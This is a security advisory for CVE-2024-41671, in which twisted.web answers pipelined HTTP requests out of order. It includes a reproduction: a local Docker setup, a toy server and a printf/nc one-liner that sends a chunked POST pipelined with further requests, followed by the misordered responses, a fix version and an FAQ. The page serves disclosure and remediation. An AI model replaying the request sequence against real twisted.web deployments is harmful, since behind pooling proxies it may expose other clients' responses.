CVE-2024-41671: twisted.web has disordered HTTP pipeline response
Summary
The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.
PoC 0. Start a fresh Debian container: sh docker run --workdir /repro --rm -it debian:bookworm-slim 1. Install twisted and its dependencies: sh apt -y update && apt -y install ncat git python3 python3-pip \ && git clone --recurse-submodules https://github.com/twisted/twisted \ && cd twisted \ && pip3 install --break-system-packages . 2. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following: python from twisted.web import server, resource from twisted.internet import reactor
class TheResource(resource.Resource): isLeaf = True
def renderGET(self, request) -> bytes: return b"GET"
def renderPOST(self, request) -> bytes: return b"POST"
site = server.Site(TheResource()) reactor.listenTCP(80, site) reactor.run() 3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection: sh (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80 4. Observe that the responses arrive out of order: HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:41 GMT Content-Length: 5 Content-Type: text/html
POST HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 4 Content-Type: text/html
GET HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 5 Content-Type: text/html
POST
Impact See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.
Other sources
Twisted is an event-based framework for internet applications, supporting Python 3.6+. The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure. This vulnerability is fixed in 24.7.0rc1.
— NVD
twisted.web has disordered HTTP pipeline response
— Microsoft
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2024-41671?
CVE-2024-41671 has been assigned a moderate severity level due to the potential for information disclosure.
How do I fix CVE-2024-41671?
To fix CVE-2024-41671, upgrade the 'twisted' package to version 24.7.0rc1 or later.
Which versions of 'twisted' are affected by CVE-2024-41671?
Versions of 'twisted' up to and including 24.3.0 are affected by CVE-2024-41671.
Is there a specific platform or environment where CVE-2024-41671 is a concern?
CVE-2024-41671 primarily affects applications using the 'twisted.web' server in HTTP 1.0 and 1.1 context.
Can CVE-2024-41671 lead to security issues beyond information disclosure?
CVE-2024-41671 focuses on information disclosure; however, improper handling of HTTP pipelined requests could lead to further security complications.